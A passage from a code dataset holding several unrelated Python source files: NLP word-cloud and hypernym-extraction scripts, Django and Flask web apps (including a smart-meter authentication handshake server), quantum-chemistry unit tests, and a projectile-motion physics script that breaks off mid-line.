Twitter()\npos_counter = Counter()\nfor i in range(length):\n\n twit_pos = twit.pos(text_sample[i])\n pos_counter += Counter(twit_pos)\n print(\"{}th Document is being processed.\".format(i))\n\ncount_df = pd.DataFrame.from_dict(pos_counter, orient='index').reset_index()\ncount_df.rename(columns={'index': 'pos', 0: 'count'}, inplace=True)\nsorted = count_df.sort_values(by='count', ascending=False)\nsorted['pos_word'] = sorted.pos.apply(lambda x: x[0])\nsorted['pos'] = sorted.pos.apply(lambda x: x[1])\n\nav_pos = ['Noun', 'Verb', 'Adjective', 'Adverb']\ngo_index = sorted.pos.isin(av_pos)\nsorted = sorted[go_index]\n\n\nword = list(sorted.pos_word)\nword = ' '.join(word)\npalace_coloring = np.array(Image.open(\"./cablecar.png\"))\nwc = WordCloud(background_color=\"white\", max_words=2000, mask=palace_coloring,\n max_font_size=40, random_state=42)\n# generate word cloud\nwc.generate(word)\n\n# create coloring from image\nimage_colors = ImageColorGenerator(palace_coloring)\n# recolor wordcloud and show\n# we could also give color_func=image_colors directly in the constructor\nplt.figure()\nplt.imshow(wc.recolor(color_func=image_colors), interpolation=\"bilinear\")\nplt.axis(\"off\")\n\nplt.figure()\nplt.imshow(palace_coloring, cmap=plt.cm.gray, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.show()","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"563705907","text":"import nltk\nimport re\nlemmatizer=nltk.stem.WordNetLemmatizer()\n\n# read in and clean corpus\nwith open('test_corpus.txt','r') as f:\n data=f.read()\n\ndef clean_line(file_line):\n sentences=nltk.sent_tokenize(file_line)\n new_sentences=[]\n for sentence in sentences:\n #sentence=re.sub(r'[^a-zA-z\\s]',r'',sentence)\n #sentence=re.sub(\"(?<=[a-z])'(?=[a-z])\", \"\", sentence)\n words=sentence.split()\n words=[word.lower() for word in words]\n #words=[lemmatizer.lemmatize(word) for word in words]\n 
sentence=' '.join(words)\n new_sentences.append(sentence)\n return new_sentences\n \n\n# test yield \ndef get_sentences(filename): \n with open(filename,'r') as f:\n for line in f:\n yield line\n\n# sentences=get_sentences('test_corpus.txt')\n# type(next(sentences))\n\n# Gold hypernyms\nimport pandas as pd\nhypers=pd.read_table('/home/srawat/Documents/Hearst Pattern Analysis/wbless/wbless.tsv')\nhypers=hypers[hypers.relation=='hyper']\nhypers=hypers.reset_index(drop=True)\nhypos=hypers.word1\nhypers=hypers.word2\n\n# Extractions from corpus\ndef extract_sents(filename,hypos,hypers):\n extractions=[]\n with open(filename,'r') as f:\n for line in f:\n sents=clean_line(line)\n for sent in sents:\n words=sent.split()\n for w1,w2 in zip(hypos,hypers):\n if w1 in words and w2 in words:\n extractions.append((sent,w1,w2))\n return extractions\n\n# Extractions from corpus without pre-processing\ndef extract_sents(filename,hypos,hypers):\n extractions=[]\n with open(filename,'r') as f:\n for line in f:\n sents=nltk.sent_tokenize(line)\n for sent in sents:\n words=sent.split()\n for w1,w2 in zip(hypos,hypers):\n if w1 in words and w2 in words:\n extractions.append((sent,w1,w2))\n return extractions\ntest_extractions=extract_sents('test_corpus.txt',hypos,hypers)\n \n# !TODO significantly less extractions without pre-processing\n\n# Check dep paths between pairs\n# Format: sent,hypo,hyper\nimport networkx as nx\nimport spacy\nnlp=spacy.load('en_core_web_sm')\n\ndef extract_dep_paths(extractions):\n dep_paths=[]\n for sent,hypo,hyper in extractions:\n doc=nlp(sent)\n edges=[]\n for token in doc:\n for child in token.children:\n edges.append(('{0}'.format(token.lower_),'{0}'.format(child.lower_)))\n graph=nx.Graph(edges)\n try:\n path=nx.shortest_path(graph,source=hypo,target=hyper)\n paths=[]\n for word in path:\n for token in doc:\n if word==token.text.lower():\n paths.append(token.text+'-'+token.pos_+'-'+token.dep_)\n paths=' '.join(paths)\n dep_paths.append((paths,hypo,hyper))\n except nx.NetworkXNoPath:\n pass\n return dep_paths\n\ntest_dep_paths=extract_dep_paths(test_extractions)\n\n# All dependencies\nall_deps=[]\nfor i in range(len(test_dep_paths)):\n sent=test_dep_paths[i][0]\n deps=[x.split('-')[2] for x in sent.split()]\n all_deps.append(deps)\n\n# unique dependencies\nimport itertools\ndeps=list(itertools.chain.from_iterable(all_deps))\ndeps=list(set(deps))\n\n# Dict vocab for deps\ndep_dict={}\nfor i in range(len(deps)):\n if deps[i] in dep_dict:\n pass\n else:\n dep_dict[deps[i]]=i\n\n# Encode dep paths extracted and freq\nenc_all_deps=[]\nfor dep in all_deps:\n _=[]\n for obj in dep:\n _.append(dep_dict[obj])\n enc_all_deps.append(_)\n\n# \n# more_than_once=[]\n# for dep in enc_all_deps:\n# for dep2 in enc_all_deps:\n# if dep==dep2:\n# more_than_once.append(dep)\n\ndep_freq_dict={}\nfor dep in enc_all_deps:\n if tuple(dep) in dep_freq_dict:\n dep_freq_dict[tuple(dep)]+=1\n else:\n dep_freq_dict[tuple(dep)]=1\n\n# stanford NLP check\n# check spacy github repo, for dependency matcher from text\n\n \n\n\n\n\n\n# test\ntest=test_dep_paths[1][0]\n[x.split('-')[2] for x in test.split()]\n\n\n# TODO: Freq of dep extractions\n\n\n# test dep\ndoc=nlp(u'Countries such as Spain, France and Germany.')\nspacy.displacy.render(doc,style='dep')\n\nedges=[] \nfor token in doc:\n for child in token.children:\n edges.append(('{0}'.format(token.lower_),'{0}'.format(child.lower_)))\n\ng=nx.Graph(edges)\npath=nx.shortest_path(g,source='spain',target='countries')\npaths=[]\nfor word in path:\n for token in 
doc:\n        if word==token.text.lower():\n            paths.append(token.text+'-'+token.pos_+'-'+token.dep_)\n    \n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212654157","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n    url( r'^$', views.index, name='index' ),\n    url( r'^ver/(.*)?/$', views.ver, name='ver' ),\n    url( r'manejar/(.*)?/$', views.manejar, name='manejar' ),\n    url( r'eliminar/(.*)?/$', views.eliminar, name='eliminar' )\n]","sub_path":"paises/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436121881","text":"import hashlib\nimport json\nimport base64\nimport requests\nfrom flask import Flask\nfrom flask import jsonify, make_response, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom random import randint\nfrom datetime import datetime\nfrom Crypto.Cipher import AES\nfrom fastecdsa import curve, point\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nid = None\nrid = None\npub_key = None\nrid_ta = None\nbase_point = None\nprime = (2 ** 256) - (2 ** 224) + (2 ** 192) + (2 ** 96) - 1\nfield = prime\nmax_transmission_time = 2\n\n\nclass SmartMeter(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    shared_token = db.Column(db.String(250))\n    pseudo_identity = db.Column(db.String(250))\n    otp = db.Column(db.String(8))\n    session_key = db.Column(db.String(250))\n\n\ndef length_equalise(x, y):\n    # pad the shorter string with spaces so both have the same length\n    if len(x) > len(y):\n        y = y + ' ' * (len(x) - len(y))\n    elif len(y) > len(x):\n        x = x + ' ' * (len(y) - len(x))\n\n    return x, y\n\n\ndef xor_word(str1, str2):\n    return ''.join(chr(ord(s) ^ ord(c)) for s, c in zip(*length_equalise(str1, str2)))\n\ndef get_nonce():\n    return randint(0, field - 1)\n\n\n@app.route(\"/add_substation\", methods=[\"POST\"])\ndef initialize():\n    global id, rid, pub_key, rid_ta, base_point\n    data = json.loads(request.get_json())\n\n    if data is None:\n        return make_response(\"Invalid Request\", 400)\n\n    id = data['id_ss']\n    rid = data['rid_ss']\n    pub_key = data['pub_key']\n    rid_ta = data['rid_ta']\n    base_point = data['base_point']\n\n    return make_response(\"Substation Initialised\", 200)\n\n\n@app.route('/add-smart-meter', methods=['POST'])\ndef add_smart_meter():\n    data = request.get_json()\n    shared_token = data['shared_token']\n    smart_meter_rid = data['pseudo_identity']\n    otp = randint(10000, 999999)\n    # otp = 278324\n    new_smart_meter = SmartMeter(shared_token=shared_token, pseudo_identity=smart_meter_rid, otp=otp)\n    db.session.add(new_smart_meter)\n    db.session.commit()\n    requests.get('http://localhost:8000/first-handshake')\n\n    return make_response('Smart Meter added', 200)\n\n\n@app.route('/first-handshake', methods=['POST'])\ndef first_contact():\n    data = json.loads(request.get_json())\n    request_time_string = data['Time']\n    request_time = datetime.strptime(request_time_string, '%Y-%m-%d %H:%M:%S.%f')\n    current_time = datetime.now()\n    timedelta = current_time - request_time\n\n    if timedelta.seconds > max_transmission_time:\n        return make_response('Stale Request', 400)\n\n    phi = data['phi']\n    alpha = data['alpha']\n    encrypted_message = data['E']\n    smart_meter_public_key = data['pub_sm']\n    X_i = data['X_i']\n    A_i = data['A_i']\n\n    hashed_rid = hashlib.sha256((rid + 
str(phi)).encode()).hexdigest()\n xored_result = xor_word(alpha, hashed_rid)\n shared_token = xored_result.split('@')[0]\n\n a_smart_meter = SmartMeter.query.filter_by(shared_token=shared_token).scalar()\n\n if not a_smart_meter or xored_result.split('@')[1] != request_time_string:\n return make_response('Malicious Request. Dropping computation', 400)\n\n smart_meter_rid = a_smart_meter.pseudo_identity\n\n encryption_obj = AES.new(smart_meter_rid[:16].encode(), AES.MODE_CBC, shared_token.encode())\n encrypted_message = base64.b64decode(encrypted_message)\n original_message = encryption_obj.decrypt(encrypted_message).decode()\n otp = original_message.strip()\n\n if str(a_smart_meter.otp) != otp:\n return make_response('Malicious Request, OTP does not match. Dropping computation', 400)\n\n ci_hashed = hashlib.sha256((str(smart_meter_public_key['x']) + str(smart_meter_public_key['y']) +\n str(pub_key['x']) + str(pub_key['y'])).encode()).hexdigest()\n ci = int(ci_hashed, 16)\n\n lhs = curve.P256.G * A_i\n sm_pub_key = point.Point(smart_meter_public_key['x'], smart_meter_public_key['y'], curve=curve.P256)\n public_key = point.Point(pub_key['x'], pub_key['y'], curve=curve.P256)\n Xi = point.Point(X_i['x'], X_i['y'], curve=curve.P256)\n rhs = Xi + (sm_pub_key + (public_key * ci))\n\n if lhs == rhs:\n rnd_nonce = get_nonce()\n T2 = str(datetime.now())\n y_hashed = hashlib.sha256((smart_meter_rid + rid_ta + str(rnd_nonce) + str(otp) + T2).encode('utf-8')).hexdigest()\n y = int(y_hashed, 16)\n Yi = curve.P256.G * y\n Zi = y * Xi\n\n session_key = hashlib.sha256(str(smart_meter_rid + rid + str(A_i) + str(Zi) + str(Yi)).encode('utf-8')).hexdigest()\n a_smart_meter.session_key = session_key\n db.session.commit()\n Vi = hashlib.sha256((str(session_key) + str(request_time_string) + T2 + str(otp.strip())).encode('utf-8')).hexdigest()\n\n Y = {\n \"x\": Yi.x,\n \"y\": Yi.y\n }\n response = {\n \"Yi\": Y,\n \"Vi\": Vi,\n \"Time\": T2\n }\n return make_response(jsonify(response), 200)\n else:\n return make_response(\"Malicious Request. Verification Failed.\", 400)\n\n\n@app.route('/second-handshake', methods=['POST'])\ndef second_contact():\n data = json.loads(request.get_json())\n request_time_string = data['Time']\n request_time = datetime.strptime(request_time_string, '%Y-%m-%d %H:%M:%S.%f')\n current_time = datetime.now()\n timedelta = current_time - request_time\n\n if timedelta.seconds > max_transmission_time:\n return make_response('Stale Request', 400)\n\n ack = data['ack']\n phi = data['phi']\n alpha = data['alpha']\n hashed_rid = hashlib.sha256((rid + str(phi)).encode()).hexdigest()\n xored_result = xor_word(alpha, hashed_rid)\n shared_token = xored_result.split('@')[0]\n\n a_smart_meter = SmartMeter.query.filter_by(shared_token=shared_token).scalar()\n\n session_key = a_smart_meter.session_key\n ack_calculated = hashlib.sha256((str(session_key) + request_time_string).encode('utf-8')).hexdigest()\n\n if ack == ack_calculated:\n return make_response('Verified', 200)\n else:\n return make_response(\"Malicious Request. 
Verification Failed.\", 400)\n\n\nif __name__ == '__main__':\n db.create_all()\n app.run(port=8001, debug=True)\n","sub_path":"Substation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"587435983","text":"# Copyright 2020 Google LLC\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" fci_graph unit tests\n\"\"\"\n#pylint: disable=protected-access\n\nimport numpy\nfrom numpy import linalg\nimport pytest\n\nfrom openfermion import FermionOperator\nfrom openfermion import bravyi_kitaev_code\n\nfrom fqe import wavefunction\nfrom fqe.hamiltonians import *\nfrom fqe.fqe_ops.fqe_ops import (\n NumberOperator,\n S2Operator,\n SzOperator,\n TimeReversalOp,\n)\nfrom fqe.fqe_decorators import build_hamiltonian\nfrom tests.unittest_data import build_hamiltonian as test_hamiltonian\nfrom fqe.util import tensors_equal\n\nimport fqe\n\n\ndef test_fqe_control_dot_vdot():\n \"\"\"Find the dot product of two wavefunctions.\n \"\"\"\n wfn1 = fqe.get_number_conserving_wavefunction(4, 8)\n wfn1.set_wfn(strategy='ones')\n wfn1.normalize()\n assert round(abs(fqe.vdot(wfn1, wfn1) - 1. + .0j), 7) == 0\n assert round(abs(fqe.dot(wfn1, wfn1) - 1. + .0j), 7) == 0\n wfn1.set_wfn(strategy='random')\n wfn1.normalize()\n assert round(abs(fqe.vdot(wfn1, wfn1) - 1. 
+ .0j), 7) == 0\n\n\ndef test_Wavefunction():\n \"\"\"Test free function that construct a Wavefunction object\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n for key, sector in wfn1._civec.items():\n assert key in wfn2._civec\n assert sector.coeff.shape == wfn2._civec[key].coeff.shape\n\n\ndef test_initialize_new_wavefunction():\n \"\"\"Test initialization of the new wavefunction\n \"\"\"\n nele = 3\n m_s = -1\n norb = 4\n wfn = fqe.get_wavefunction(nele, m_s, norb)\n assert isinstance(wfn, wavefunction.Wavefunction)\n\n\ndef test_initialize_new_wavefunctions_multi():\n \"\"\"Test initialization of the new wavefunction with multiple parameters\n \"\"\"\n multiple = [[4, 0, 4], [4, 2, 4], [3, -3, 4], [1, 1, 4]]\n wfns = fqe.get_wavefunction_multiple(multiple)\n for wfn in wfns:\n assert isinstance(wfn, wavefunction.Wavefunction)\n\n\ndef test_time_evolve():\n \"\"\"Test time_evolve of a wavefunction\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn1.set_wfn('ones')\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n wfn2.set_wfn('ones')\n op = FermionOperator('1^ 3') + FermionOperator('3^ 1')\n time = 1.2\n wfn1 = fqe.time_evolve(wfn1, time, op, True)\n wfn2 = wfn2.time_evolve(time, op, True)\n for key, sector in wfn1._civec.items():\n assert key in wfn2._civec\n assert sector.coeff.shape == wfn2._civec[key].coeff.shape\n assert numpy.allclose(sector.coeff, wfn2._civec[key].coeff)\n\n\ndef test_apply():\n \"\"\"Test time_evolve of a wavefunction\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn1.set_wfn('ones')\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n wfn2.set_wfn('ones')\n op = FermionOperator('1^ 3') + FermionOperator('3^ 1')\n wfn1 = fqe.apply(op, wfn1)\n wfn2 = wfn2.apply(op)\n for key, sector in wfn1._civec.items():\n assert key in wfn2._civec\n assert sector.coeff.shape == wfn2._civec[key].coeff.shape\n assert numpy.allclose(sector.coeff, wfn2._civec[key].coeff)\n\n\ndef test_expectationValue():\n \"\"\"Test time_evolve of a wavefunction\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn1.set_wfn('ones')\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n wfn2.set_wfn('ones')\n op = sparse_hamiltonian.SparseHamiltonian(FermionOperator('1^ 3'))\n ex1 = fqe.expectationValue(wfn1, op)\n ex2 = wfn2.expectationValue(op)\n assert numpy.isclose(ex1, ex2)\n\n\ndef test_apply_generated_unitary():\n \"\"\"Test applying generated unitary transformation\n \"\"\"\n norb = 4\n nele = 3\n time = 0.001\n ops = FermionOperator('1^ 3^ 5 0', 2.0 - 2.j) + FermionOperator(\n '0^ 5^ 3 1', 2.0 + 2.j)\n\n wfn = fqe.get_number_conserving_wavefunction(nele, norb)\n wfn.set_wfn(strategy='random')\n wfn.normalize()\n\n reference = fqe.apply_generated_unitary(wfn, time, 'taylor', ops)\n\n h1e = numpy.zeros((2 * norb, 2 * norb), dtype=numpy.complex128)\n h2e = hamiltonian_utils.nbody_matrix(ops, norb)\n h2e = hamiltonian_utils.antisymm_two_body(h2e)\n hamil = general_hamiltonian.General(tuple([h1e, h2e]))\n compute = wfn.apply_generated_unitary(time, 'taylor', hamil)\n\n for key in wfn.sectors():\n diff = reference._civec[key].coeff - compute._civec[key].coeff\n err = linalg.norm(diff)\n assert err < 1.e-8\n\n\ndef test_cirq_interop(c_or_python):\n \"\"\"Check the transition from a line qubit and back.\n \"\"\"\n fqe.settings.use_accelerated_code = c_or_python\n work = numpy.random.rand(16).astype(numpy.complex128)\n work[0] = 0.0 + 0.0j\n work[15] = 0.0 + 0.0j\n norm = numpy.sqrt(numpy.vdot(work, work))\n numpy.divide(work, norm, out=work)\n wfn = 
fqe.from_cirq(work, thresh=1.0e-7)\n sec = [(1, -1), (1, 1), (2, -2), (2, 0), (2, 2), (3, -1), (3, 1)]\n assert set(sec) == set(wfn._civec.keys())\n test = fqe.to_cirq(wfn)\n assert numpy.allclose(test, work)\n\n # check with Bravyi-Kitaev\n bc = bravyi_kitaev_code(4)\n wfn = fqe.from_cirq(work, thresh=1.0e-7, binarycode=bc)\n test = fqe.to_cirq(wfn, binarycode=bc)\n assert numpy.allclose(test, work)\n\n\ndef test_get_spin_conserving_wavefunction():\n \"\"\" Test get_spin_conserving_wavefunction\n \"\"\"\n norb = 4\n s_z = 2\n wfn_spin = fqe.get_spin_conserving_wavefunction(s_z, norb)\n\n assert 's_z' in wfn_spin._conserved.keys()\n assert wfn_spin._conserved['s_z'] == 2\n assert wfn_spin.conserve_spin()\n\n ref_sectors = {(2, 2), (4, 2), (6, 2)}\n assert ref_sectors == set(wfn_spin.sectors())\n\n s_z = -2\n\n wfn_spin = fqe.get_spin_conserving_wavefunction(s_z, norb)\n\n assert 's_z' in wfn_spin._conserved.keys()\n assert wfn_spin._conserved['s_z'] == -2\n assert wfn_spin.conserve_spin()\n\n ref_sectors = {(2, -2), (4, -2), (6, -2)}\n assert ref_sectors == set(wfn_spin.sectors())\n\n\ndef test_get_number_conserving_wavefunction():\n \"\"\" Test get_number_conserving_wavefunction\n \"\"\"\n norb = 4\n nel = 2\n wfn_spin = fqe.get_number_conserving_wavefunction(nel, norb)\n\n assert 'n' in wfn_spin._conserved.keys()\n assert wfn_spin._conserved['n'] == 2\n assert wfn_spin.conserve_number()\n\n ref_sectors = {(2, 2), (2, 0), (2, -2)}\n assert ref_sectors == set(wfn_spin.sectors())\n\n\ndef test_operator_constructors():\n \"\"\" Creation of FQE-operators\n \"\"\"\n assert isinstance(fqe.get_s2_operator(), S2Operator)\n assert isinstance(fqe.get_sz_operator(), SzOperator)\n assert isinstance(fqe.get_time_reversal_operator(), TimeReversalOp)\n assert isinstance(fqe.get_number_operator(), NumberOperator)\n\n\ndef test_get_hamiltonian_from_openfermion_raises():\n \"\"\" Check the type check of get_hamiltonian_from_openfermion()\n \"\"\"\n with pytest.raises(AssertionError):\n fqe.get_hamiltonian_from_openfermion([])\n\n\ndef test_get_hamiltonian_from_openfermion():\n \"\"\" Check get_hamiltonian_from_openfermion()\n \"\"\"\n norb = 4\n ops = test_hamiltonian.number_nonconserving_fop(2, norb=norb)\n test = fqe.get_hamiltonian_from_openfermion(ops, norb=norb, \\\n conserve_number=False)\n test2 = build_hamiltonian(ops, norb=norb, conserve_number=False)\n assert test == test2\n\n\ndef test_get_diagonal_hamiltonian():\n \"\"\" Check whether get_diagonal_hamiltonian returns the same value as its\n underlying function is supposed to return.\n \"\"\"\n diag = numpy.zeros((5,), dtype=numpy.complex128)\n e_0 = -4.2\n test = diagonal_hamiltonian.Diagonal(diag, e_0)\n test2 = fqe.get_diagonal_hamiltonian(diag, e_0)\n\n assert test == test2\n\n\ndef test_get_diagonal_coulomb():\n \"\"\" Check whether get_diagonal_coulomb returns the same value as its\n underlying function is supposed to return.\n \"\"\"\n diag = numpy.zeros((5, 5), dtype=numpy.complex128)\n e_0 = -4.2\n test = diagonal_coulomb.DiagonalCoulomb(diag, e_0)\n test2 = fqe.get_diagonalcoulomb_hamiltonian(diag, e_0)\n\n assert test == test2\n\n\n@pytest.mark.parametrize(\"hamiltonian, get_function\", \\\n [ (sso_hamiltonian.SSOHamiltonian, fqe.get_sso_hamiltonian),\n (gso_hamiltonian.GSOHamiltonian, fqe.get_gso_hamiltonian),\n (general_hamiltonian.General, fqe.get_general_hamiltonian),\n (restricted_hamiltonian.RestrictedHamiltonian, \\\n fqe.get_restricted_hamiltonian)\n ])\ndef test_get_hamiltonians(hamiltonian, get_function):\n \"\"\" Check 
whether other Hamiltonian getters return the same value\n as their underlying functions are supposed to return.\n \"\"\"\n h1e = numpy.random.rand(5, 5).astype(numpy.complex128)\n e_0 = -4.2\n test = hamiltonian((h1e,))\n test2 = get_function((h1e,))\n\n assert test == test2\n\n\ndef test_get_sparse_hamiltonian():\n oper = FermionOperator('0 0^')\n test = sparse_hamiltonian.SparseHamiltonian(oper)\n test2 = fqe.get_sparse_hamiltonian(oper)\n\n assert test == test2\n","sub_path":"tests/_fqe_control_test.py","file_name":"_fqe_control_test.py","file_ext":"py","file_size_in_byte":9485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"194479654","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask, send_from_directory, request, jsonify\nfrom flask_cors import CORS, cross_origin\napp = Flask(__name__)\nCORS(app)\n\nfrom UploadSectionsHandler import UploadSectionsHandler\nfrom GetSectionsHandler import GetSectionsHandler\nfrom UploadPathHandler import UploadPathHandler\nfrom BoundingBoxHandler import BoundingBoxHandler\nfrom UploadMapHandler import UploadMapHandler\nfrom GetSVGPathHandler import GetSVGPathHandler\nfrom UploadImageHandler import UploadImageHandler\n\nfrom DatabaseManager import DatabaseManager\n\nfrom InvalidUsage import InvalidUsage\nimport sys\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n@app.route('/')\ndef hello_world():\n return \"hello world\"\n\n# used to upload the SVG map\n@app.route('/upload-map', methods=['POST'])\ndef uploadMap():\n try:\n return UploadMapHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# used to upload an image for section content\n@app.route('/upload-image', methods=['POST'])\ndef uploadImage():\n try:\n return UploadImageHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# used after path has been adjusted, uploads path, zoom level, osm data and points\n@app.route('/upload-path', methods=['POST'])\ndef path():\n try:\n return UploadPathHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# requests boundingbox of a given mapId\n@app.route('/boundingbox', methods=['GET'])\ndef boundingbox():\n try:\n return BoundingBoxHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# requests the flattened svg path in coordinates\n@app.route('/svg-path', methods=['GET'])\ndef svgPath():\n try:\n return GetSVGPathHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# requests sections for a given mapId\n@app.route('/storytelling-sections', methods=['GET'])\ndef storytellingSections():\n try:\n return GetSectionsHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# uploads changes to storytelling sections\n@app.route('/upload-storytelling-sections', methods=['POST'])\ndef uploadStorytellingSections():\n try:\n return UploadSectionsHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n\n@app.route('/backend/output/')\ndef send_output(path):\n return send_from_directory('output', path)\n\nif __name__ == \"__main__\":\n DatabaseManager().initializeDatabase()\n app.run(debug=True, 
threaded=True)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402136395","text":"import matplotlib.pylab as plt\nimport numpy as np\nimport math\n\n# our program will grow over time with new cases so as to cover the widest possible range of projectile motion\n# the interactive part for the user is planned for later, so for now we assume some constants\n\n# notation:\ng = 9.81 # can be changed if needed; for now a constant in [m/s^2]\nh = 1.0 # height from which the throw starts [m]\nVo = 20 # initial velocity [m/s]\nalfa = 60 # inclination angle of the Vo vector above the horizontal, in degrees; range to be decided\ntc = 0.0 # total flight time\nH = 0.0 # maximum height the body rises above the initial height\nHmax = 0.0 # maximum height the body will reach\nz = 0.0 # range of the throw\nt = 0.0\nVgr = 8000 # velocity of the gases expelled from the rocket\na = 5 # rate of mass loss\nm = 250\nG = 6.7*(10**(-11))\nMz = 6*(10**24) #[kg]\nRz = 6371000 #[m]\nV1 = np.around(np.sqrt((G*Mz)/Rz), 1) #[m/s]\nV2 = np.around((np.sqrt(2) * V1), 1)\nx = []\ny = []\n\ndef skladowe (kat,pirewotna): # routine computing the components of the vector\n    sinalf = np.around(np.sin(np.deg2rad(kat)),4)\n    cosalf = np.around(np.cos(np.deg2rad(kat)),4)\n    skłX = np.around(pirewotna * cosalf,4)\n    skłY = np.around(pirewotna * sinalf,4)\n    print('component of the initial value along x:', skłX \\\n        , 'component of the initial value along y:', skłY)\n    return [skłX,skłY]\n\n\ndef CzasLotu(g, Vox, Voy, h, beta):\n    # x = Vox * t ==> t = x/Vox\n    # y = h + Voy*t - (g*t^2)/2 ==> y = h + (Voy/Vox)*x - (g*x^2)/2*Vox^2\n    # y = tg(beta)*t ==> y = tg(beta)/Vox * x\n    # -(g*x^2)/2*Vox^2 + (Voy/Vox - tg(beta)/Vox) * x + h = 0\n    a = - g / (2 * (Vox**2))\n    b = (Voy/Vox) - (np.tan(np.deg2rad(beta)) / Vox)\n    c = h\n    delta = (b * b) - 4 * a * c\n    x1 = (-b - math.sqrt(delta)) / (2 * a)\n    x2 = (-b + math.sqrt(delta)) / (2 * a)\n    if x1 >= x2:\n        t = np.around(x1/Vox, 4)\n    else:\n        t = np.around(x2/Vox, 4)\n    print('The flight time is t =', t)\n    return (t)\n\n\ndef MaxWysokosc(Voy, g): # routine computing the maximum height of the body\n    H = np.around((Voy ** 2) / (2 * g), 4)\n    Hmax = H + h\n    print('the maximum height the body will reach is H =', Hmax, 'm')\n    return (Hmax)\n\n\ndef Zasieg(Vox, tc):\n    z = np.around(Vox * tc, 4)\n    print('The range of the throw is z =', z, 'm')\n    return (z)\n\ndef PredkosciChwilowe(tc, Vox, Voy, g,t,Hmax,h):\n    global x\n    global y\n    i = 0\n    while t < tc:\n        Vx = Vox\n        Vy = Voy - g * t\n        if i >= 1:\n            x.append(Vx * t)\n            y.append(y[i-1] + Vy * dt)\n        else:\n            x.append(Vx * t)\n            y.append(h + Vy * t)\n        dt = 0.1\n        t = t + dt\n        i += 1\n    return x, y\n\ndef Rakieta(m, a, t, Vgr):\n    print(\"Rocket\")\n    while (a*t) <= 3*m/4:\n        Vr = np.around(Vgr * np.log(m/(m - a * t)), 1)\n        t += 0.5\n        if Vr >= V1:\n            print(\"The rocket reached the first cosmic velocity and can stay in Earth orbit\")\n            return Vr\n    print(\"The rocket did not reach the first cosmic velocity\")\n\ndef InnePlanety(G, Mz, Rz):\n    planety = {}\n    odp = \"YES\"\n    print(\"The program computes the first cosmic velocity for different planets. The velocity is given in m/s.\")\n    while odp == \"YES\":\n        nazwa = input(\"Enter the planet name: \")\n        x = float(input(\"Planet mass. Enter the number by which the Earth's mass should be multiplied: \"))\n        y = float(input(\"Planet radius. 
Enter the number by which the Earth's radius should be multiplied: \"))\n        mp = x * Mz\n        rp = y * Rz\n        v = np.around(np.sqrt((G * mp) / rp), 4)\n        planety[nazwa] = v\n        print(planety)\n        odp = str.upper(input(\"Do you want to add another planet? Type YES or NO: \"))\n    return planety\n\nprint('Welcome!!!!')\nh = float(input('From what height should the throw start h = '))\nalfa = float(input('At what angle to the horizontal should the throw be made alfa = '))\nVo = float(input('What should the initial velocity of the object be Vo = '))\nprint(\"\"\"\n    0 - the ground goes neither up nor down\n    1 - the ground rises at an angle beta to the horizontal\n    2 - the ground falls at an angle beta to the horizontal\n    \"\"\")\nwybor = int(input('Your choice is: '))\nif wybor == 0:\n    beta = 0\nelif wybor == 1:\n    beta = float(input('The angle beta should be beta = '))\nelif wybor == 2:\n    beta = float(input('The angle beta should be beta = '))\n    beta = 180 - beta\nelse:\n    print('Error: there is no such choice!!!')\n\nVox, Voy = skladowe(alfa, Vo)\ntc = CzasLotu(g,Vox,Voy,h,beta)\nHmax = MaxWysokosc(Voy, g)\nz = Zasieg(Vox, tc)\nPredkosciChwilowe(tc,Vox,Voy,g,t,Hmax,h)\n\nplt.plot(x, 